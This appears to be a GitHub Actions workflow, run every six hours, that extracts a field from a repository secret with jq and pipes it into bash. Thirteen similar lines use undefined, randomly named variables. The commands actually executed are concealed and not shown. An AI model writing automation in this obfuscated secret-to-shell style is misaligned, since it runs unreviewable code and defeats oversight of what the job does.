name: guoqingminus
on:
  workflow_dispatch:
  schedule:
    - cron: '46 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guoqingminus
        env:
          sfdwn11: ${{ secrets.sfdwn11 }}
        run: |
          echo $sfdwn11 | jq -r .mvj44 | /bin/bash
          echo $bgqvj13 | jq -r .sdc8778 | /bin/bash
          echo $yiu78 | jq -r .fcg493 | /bin/bash
          echo $quc78 | jq -r .srbcf95 | /bin/bash
          echo $pejem316 | jq -r .j75419 | /bin/bash
          echo $yr503 | jq -r .akwor548 | /bin/bash
          echo $hjkb3783 | jq -r .y73102 | /bin/bash
          echo $ge906 | jq -r .fr21069 | /bin/bash
          echo $camhc81885 | jq -r .kfxxo47842 | /bin/bash
          echo $ko87594 | jq -r .qhqku318 | /bin/bash
          echo $d58 | jq -r .rrn28 | /bin/bash
          echo $z9 | jq -r .rcr72268 | /bin/bash
          echo $g77 | jq -r .fpfn855 | /bin/bash
          echo $jb017 | jq -r .crd9 | /bin/bash

